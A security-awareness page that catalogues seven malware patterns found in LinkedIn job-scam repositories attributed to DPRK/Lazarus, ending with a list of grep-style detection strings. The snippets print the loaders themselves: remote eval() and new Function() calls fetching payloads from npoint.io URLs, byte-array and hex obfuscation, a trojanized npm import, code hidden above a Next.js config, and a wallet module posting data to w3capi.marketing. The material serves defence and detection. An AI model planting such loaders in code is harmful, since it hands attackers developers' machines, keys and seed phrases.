back

Code Samples

Real malicious code patterns from LinkedIn scam repositories

7 patterns13 repositoriesDPRK / Lazarus

Malicious Code Patterns

Remote eval() via API

Most common
critical
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
  const result = await axios.get(
    "https://api.npoint.io/ac2916e3f543effa2edd"
  );
  eval(result.data.cookie);
})();

Fetches obfuscated JavaScript from a remote API endpoint and executes it with eval(). The payload contains a full reverse shell, clipboard monitor, and file exfiltration toolkit.

userController.jscontroller.jspaymentRoute.jsauthHelper.jswallet.js

Byte-array URL obfuscation

Golden City v2
critical
const byteArray = [104,116,116,112,115,58,47,47,97,112,105,...];
const uint8Array = new Uint8Array(byteArray);
const decoder = new TextDecoder('utf-8');
axios.get(decoder.decode(uint8Array)).then(response => {
  new Function("require", response.data.cookie)(require);
});

Hides the malicious URL as a byte array to evade string-based detection. Decodes at runtime and fetches the payload, then executes it via new Function() with access to require().

next.config.jsconfig/setup.js

new Function() variant

Sarostech
critical
const createHandler = (errCode) => {
  const handler = new Function("require", errCode);
  return handler;
};
handlerFunc(require);

Uses new Function() constructor to create a function from a string and passes Node.js require as argument, giving the payload full access to the filesystem and network.

utils/errorHandler.jsmiddleware/auth.js

Malicious npm package

ERC20 DApp
critical
// vite.config.js
import { fetchIcon } from "cdn-icon-fetch";
fetchIcon("77"); // triggers malware

Uses a trojanized npm package disguised as an icon utility. The package runs malware on import. Other known packages: icon-font-fetch, asset-icon-fetch, materials-icons.

vite.config.jspackage.json

Payment route disguise

Munity Game
critical
router.post("/process-payment", async (req, res) => {
  const response = await axios.get(
    "https://api.npoint.io/f7578d215b0835ed169c"
  );
  eval(response.data.verification);
});

Disguises malware as payment processing logic. The eval() call executes the remote payload when the payment route is triggered during development or testing.

routes/payment.jscontrollers/paymentController.js

Obfuscated next.config.js

Multify Staking
high
// next.config.js — malware hidden BEFORE the legitimate config
const _0x4a2b = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f',...];
(function(_0x1a2b, _0x3c4d) {
  eval(Buffer.from(_0x4a2b.join('')).toString());
})();

// Normal Next.js config below — you'd never scroll up
/** @type {import('next').NextConfig} */
const nextConfig = { reactStrictMode: true };
module.exports = nextConfig;

Malicious code is placed before the legitimate Next.js configuration. Developers opening the file see valid config at the bottom and never scroll up to the obfuscated payload above.

next.config.js

Wallet analytics disguise

Web3Game
critical
// walletConnect.js
const analytics = await axios.get(
  "https://w3capi.marketing/analytics"
);
eval(analytics.data.track);

// Exfiltrates wallet data to w3capi.marketing
const sendData = (d) => axios.post(
  "https://w3capi.marketing/collect", d
);

Hides eval() inside wallet connection logic. Data exfiltration endpoint (w3capi.marketing) is disguised as a web analytics service. Steals private keys and seed phrases.

utils/walletConnect.jslib/web3Provider.js

Quick Detection Patterns

Search for these patterns in any codebase before running it:

eval(result.data
eval(response.data
new Function("require"
axios.get(...).then(r => eval(
Buffer.from(...).toString()
new TextDecoder().decode(new Uint8Array(
npoint.io
w3capi.marketing
cdn-icon-fetch
process.on("uncaughtException", () => {})